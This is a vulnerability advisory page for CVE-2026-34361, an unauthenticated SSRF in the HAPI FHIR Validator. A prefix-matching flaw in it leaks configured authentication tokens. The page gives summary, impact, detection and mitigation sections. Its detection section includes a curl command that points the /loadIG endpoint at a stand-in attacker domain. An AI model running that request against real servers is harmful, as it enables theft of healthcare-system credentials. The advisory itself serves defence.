CVE-2026-34361
Received Received - Intake
Unauthenticated SSRF and Token Theft in HAPI FHIR Validator

Publication date: 2026-03-31

Last updated on: 2026-04-03

Assigner: GitHub, Inc.

Description
HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.4, the FHIR Validator HTTP service exposes an unauthenticated "/loadIG" endpoint that makes outbound HTTP requests to attacker-controlled URLs. Combined with a startsWith() URL prefix matching flaw in the credential provider (ManagedWebAccessUtils.getServer()), an attacker can steal authentication tokens (Bearer, Basic, API keys) configured for legitimate FHIR servers by registering a domain that prefix-matches a configured server URL. This issue has been patched in version 6.9.4.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-31
Last Modified
2026-04-03
Generated
2026-06-16
AI Q&A
2026-03-31
EPSS Evaluated
2026-06-15
NVD
CVE-2026-34361
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
hapifhir hl7_fhir_core to 6.9.4 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-552 The product makes files or directories accessible to unauthorized actors, even though they should not be.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-34361 is a critical unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the HAPI FHIR Validator HTTP service, specifically via the /loadIG endpoint in versions prior to 6.9.4.

The /loadIG endpoint accepts unauthenticated POST requests containing a JSON body with an "ig" field. If this field contains an HTTP(S) URL, the service makes an outbound GET request to that URL.

A flaw in the credential provider uses a startsWith() string comparison to decide if authentication credentials (Bearer tokens, Basic auth, API keys) should be attached to outbound requests. This allows an attacker to register a domain that prefix-matches a legitimate configured server URL and steal authentication tokens intended for that legitimate server.

Additionally, the HTTP client follows redirects without properly disabling credential re-evaluation, enabling redirect amplification attacks where credentials can be leaked through indirect redirect chains.

This vulnerability enables attackers to steal sensitive authentication credentials and potentially publish malicious FHIR packages or cause data breaches.

Impact Analysis

This vulnerability can lead to theft of sensitive authentication tokens such as Bearer tokens, Basic authentication credentials, and API keys configured for legitimate FHIR servers.

Attackers can use stolen credentials to perform supply chain attacks by publishing malicious FHIR packages, potentially compromising downstream systems.

It can also result in data breaches exposing protected clinical data, impacting confidentiality.

The vulnerability has a high severity with a CVSS score of 9.3, indicating critical impact with no required privileges or user interaction.

Detection Guidance

This vulnerability can be detected by monitoring for unauthenticated POST requests to the /loadIG endpoint of the FHIR Validator HTTP service, especially those containing JSON bodies with an "ig" field set to HTTP(S) URLs.

Network detection can focus on outbound HTTP GET requests initiated by the service to attacker-controlled or unexpected domains that prefix-match legitimate configured server URLs.

Suggested commands include using network monitoring tools or packet capture utilities to filter for POST requests to /loadIG and outbound HTTP requests from the service.

  • Using curl to test the endpoint: curl -X POST http://<FHIR-validator-host>/loadIG -H "Content-Type: application/json" -d '{"ig":"http://attacker-controlled-domain.com"}'
  • Using tcpdump or Wireshark to capture outbound HTTP requests from the FHIR Validator server to suspicious domains.
  • Checking server logs for unauthenticated POST requests to /loadIG with unusual or external URLs in the "ig" field.
Mitigation Strategies

Immediate mitigation steps include upgrading the HAPI FHIR Validator component to version 6.9.4 or later, where the vulnerability has been patched.

If upgrading is not immediately possible, restrict access to the /loadIG endpoint to trusted users or networks to prevent unauthenticated requests.

Implement network-level controls such as firewall rules or proxy allowlisting to restrict outbound HTTP requests from the FHIR Validator service to only trusted hosts (e.g., packages.fhir.org, packages2.fhir.org, build.fhir.org).

Review and update the credential provider logic to avoid using startsWith() prefix matching for URL credential attachment, ensuring strict URL origin matching.

Compliance Impact

This vulnerability allows attackers to steal authentication tokens (Bearer, Basic, API keys) configured for legitimate FHIR servers, which can lead to unauthorized access to protected clinical data.

The theft of sensitive authentication credentials and potential exposure of protected clinical data can result in violations of data protection regulations such as GDPR and HIPAA, which mandate strict controls over personal and health information.

By enabling supply chain attacks and unauthorized data access, this vulnerability undermines the confidentiality and security requirements essential for compliance with these standards.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-34361. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart